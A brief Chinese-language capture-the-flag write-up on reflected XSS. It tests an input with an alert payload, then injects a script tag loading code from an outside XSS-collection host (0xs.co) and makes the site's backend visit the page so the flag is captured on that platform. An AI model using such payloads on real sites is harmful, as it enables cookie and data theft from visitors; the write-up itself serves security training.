反射型XSS
查看頁面:
第一個輸入框與下面Hello后的內容相同,猜測可以通過該輸入,改變頁面內容。
進行測試:
<script>alert(1)</script>
默認使用get方式發送Payload,成功彈窗。
經過測試,第二個輸入框輸入URL時,返回SUCCESS
,猜測在后台進行訪問。
嘗試使用XSS Platform,在第一個框中輸入 包含腳本 網址:<script src=//0xs.co/YGlQP></script>
。
通過第二個框,訪問包含了XSS腳本的本頁面URL:
於平台獲得FLAG。